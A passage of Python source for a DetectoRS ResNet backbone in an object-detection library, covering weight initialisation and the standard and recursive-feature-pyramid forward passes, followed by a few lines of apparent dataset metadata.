dcn=dcn, sac=sac, rfp_inplanes=rfp_inplanes if i > 0 else None, plugins=stage_plugins) self.inplanes = planes * self.block.expansion layer_name = f'layer{i + 1}' self.add_module(layer_name, res_layer) self.res_layers.append(layer_name) self._freeze_stages() # In order to be properly initialized by RFP def init_weights(self): # Calling this method will cause parameter initialization exception # super(DetectoRS_ResNet, self).init_weights() if isinstance(self.pretrained, str): logger = get_root_logger() load_checkpoint(self, self.pretrained, strict=False, logger=logger) elif self.pretrained is None: for m in self.modules(): if isinstance(m, nn.Conv2d): kaiming_init(m) elif isinstance(m, (_BatchNorm, nn.GroupNorm)): constant_init(m, 1) if self.dcn is not None: for m in self.modules(): if isinstance(m, Bottleneck) and hasattr( m.conv2, 'conv_offset'): constant_init(m.conv2.conv_offset, 0) if self.zero_init_residual: for m in self.modules(): if isinstance(m, Bottleneck): constant_init(m.norm3, 0) elif isinstance(m, BasicBlock): constant_init(m.norm2, 0) else: raise TypeError('pretrained must be a str or None') def make_res_layer(self, **kwargs): """Pack all blocks in a stage into a ``ResLayer`` for DetectoRS.""" return ResLayer(**kwargs) def forward(self, x): """Forward function.""" outs = list(super(DetectoRS_ResNet, self).forward(x)) if self.output_img: outs.insert(0, x) return tuple(outs) def rfp_forward(self, x, rfp_feats): """Forward function for RFP.""" if self.deep_stem: x = self.stem(x) else: x = self.conv1(x) x = self.norm1(x) x = self.relu(x) x = self.maxpool(x) outs = [] for i, layer_name in enumerate(self.res_layers): res_layer = getattr(self, layer_name) rfp_feat = rfp_feats[i] if i > 0 else None for layer in res_layer: x = layer.rfp_forward(x, rfp_feat) if i in self.out_indices: outs.append(x) return tuple(outs)
1
24,070
For insurance, it's best not to take it directly
open-mmlab-mmdetection
py